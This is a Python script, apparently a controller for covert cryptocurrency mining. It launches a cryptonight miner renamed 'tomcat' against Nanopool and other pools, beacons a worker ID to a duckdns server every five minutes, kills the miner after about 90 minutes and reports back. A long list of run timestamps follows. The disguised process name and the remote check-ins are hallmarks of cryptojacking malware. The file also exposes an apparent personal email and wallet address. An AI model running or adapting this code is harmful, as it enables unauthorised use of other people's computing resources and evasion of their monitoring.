import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:09:05.157359
#2018-02-17 15:56:04.147186
#2018-02-17 17:44:06.420295
#2018-02-17 19:32:07.247854
#2018-02-17 21:21:07.107920
#2018-02-17 23:05:05.480273
#2018-02-18 00:53:03.684353
#2018-02-18 02:41:01.566086
#2018-02-18 04:28:06.550795
#2018-02-18 06:19:01.368489
#2018-02-18 08:09:04.420672
#2018-02-18 09:56:03.833021
#2018-02-18 11:43:07.574812
#2018-02-18 13:28:05.106533
#2018-02-18 15:18:05.178097
#2018-02-18 17:07:01.342244
#2018-02-18 18:54:03.611165
#2018-02-18 20:42:05.048318
#2018-02-18 22:27:01.281030
#2018-02-19 00:16:05.125130
#2018-02-19 02:02:04.210417
#2018-02-19 03:48:06.579579
#2018-02-19 05:32:01.315549
#2018-02-19 07:20:04.540040
#2018-02-19 09:09:04.681186
#2018-02-19 10:58:08.276097
#2018-02-19 12:47:08.213571
#2018-02-19 14:37:08.792115
#2018-02-19 16:26:08.264791
#2018-02-19 18:12:08.222675
#2018-02-19 20:00:09.181982
#2018-02-19 21:48:07.391129
#2018-02-19 23:34:06.254708
#2018-02-20 01:20:05.657184
#2018-02-20 03:10:04.130860
#2018-02-20 04:56:04.519360
#2018-02-20 06:40:09.298987
#2018-02-20 08:24:08.365802
#2018-02-20 10:09:08.019978
#2018-02-20 11:53:05.216387
#2018-02-20 13:40:06.360551
#2018-02-20 15:24:05.118878
#2018-02-20 17:10:12.693927
#2018-02-20 18:58:09.156743
#2018-02-20 20:49:01.304395
#2018-02-20 22:33:01.319617
#2018-02-21 00:16:04.541146
#2018-02-21 02:02:04.645379
#2018-02-21 03:49:06.468414
#2018-02-21 05:32:05.570576
#2018-02-21 07:20:09.633547
#2018-02-21 09:04:07.092890
#2018-02-21 10:52:06.205858
#2018-02-21 12:39:08.640463
#2018-02-21 14:27:05.849690
#2018-02-21 16:13:08.140236
#2018-02-21 18:03:01.684636
#2018-02-21 19:49:09.516936
#2018-02-21 21:37:07.269961
#2018-02-21 23:23:01.280286
#2018-02-22 01:11:04.193622
#2018-02-22 03:01:07.384713
#2018-02-22 04:48:02.088726
#2018-02-22 06:33:04.865268
#2018-02-22 08:21:07.527867
#2018-02-22 10:09:03.619554
#2018-02-22 11:55:09.743303
#2018-02-22 13:39:06.371444
#2018-02-22 15:27:06.412675
#2018-02-22 17:14:02.033761
#2018-02-22 18:59:05.840768
#2018-02-22 20:51:01.450643
#2018-02-22 22:38:06.205057
#2018-02-23 00:24:03.626179
#2018-02-23 02:12:06.692499
#2018-02-23 04:03:05.203371
#2018-02-23 05:49:04.269803
#2018-02-23 07:38:06.344789
#2018-02-23 09:41:03.467515
#2018-02-23 11:47:09.681194
#2018-02-23 13:37:08.202198
#2018-02-23 15:26:01.733152
#2018-02-23 17:16:08.524677
#2018-02-23 18:59:01.741101
#2018-02-23 20:45:07.920980
#2018-02-23 22:34:05.953656
#2018-02-24 00:21:01.232218
#2018-02-24 02:12:05.022447
#2018-02-24 04:03:05.796212
#2018-02-24 05:47:06.407494
#2018-02-24 07:39:01.832450
#2018-02-24 09:24:07.167097
#2018-02-24 11:18:07.827317
#2018-02-24 13:07:06.664786
#2018-02-24 14:56:02.105805
#2018-02-24 16:46:01.348483
#2018-02-24 18:34:03.656527
#2018-02-24 20:21:04.896793
#2018-02-24 22:17:01.766567
#2018-02-25 01:25:06.394632
#2018-02-25 04:50:07.156969
#2018-02-25 08:12:03.866020